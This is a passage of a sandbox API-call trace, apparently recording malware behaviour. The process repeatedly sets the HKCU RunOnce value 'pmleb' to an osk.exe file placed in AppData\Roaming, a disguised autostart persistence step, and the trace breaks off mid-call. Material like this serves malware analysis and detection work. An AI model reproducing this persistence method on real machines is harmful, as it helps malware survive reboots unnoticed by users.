FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.380] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0079.380] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.380] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x38 [0079.380] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.381] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0079.381] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.381] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.381] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.381] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.381] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.381] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.381] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.381] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.381] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.381] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.382] RegCloseKey (hKey=0x280) returned 0x0 [0079.382] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.382] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.382] SetTimer (hWnd=0x20280, nIDEvent=0x2037, uElapse=0xa, lpTimerFunc=0x0) returned 0x2037 [0079.382] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.394] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.394] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.394] KillTimer (hWnd=0x20280, uIDEvent=0x2037) returned 1 [0079.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.394] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.394] IUnknown:Release (This=0x787518) returned 0x1 [0079.394] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.395] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.395] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.395] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.395] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.395] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0079.395] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.395] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x39 [0079.395] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.396] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0079.396] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.396] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.396] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.396] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.396] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.396] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.396] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.396] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.397] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.397] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.397] RegCloseKey (hKey=0x280) returned 0x0 [0079.397] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.397] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.397] SetTimer (hWnd=0x20280, nIDEvent=0x2038, uElapse=0xa, lpTimerFunc=0x0) returned 0x2038 [0079.397] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.409] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.409] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.410] KillTimer (hWnd=0x20280, uIDEvent=0x2038) returned 1 [0079.410] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.410] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.410] IUnknown:Release (This=0x787518) returned 0x1 [0079.410] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.410] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.410] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.410] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.410] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.411] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.411] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0079.411] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.411] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3a [0079.411] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.412] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0079.412] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.412] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.412] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.412] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.412] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.412] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.412] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.412] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.413] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.413] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.413] RegCloseKey (hKey=0x280) returned 0x0 [0079.413] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.413] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.413] SetTimer (hWnd=0x20280, nIDEvent=0x2039, uElapse=0xa, lpTimerFunc=0x0) returned 0x2039 [0079.413] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.435] KillTimer (hWnd=0x20280, uIDEvent=0x2039) returned 1 [0079.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.435] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.435] IUnknown:Release (This=0x787518) returned 0x1 [0079.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.436] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.436] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.436] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.436] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 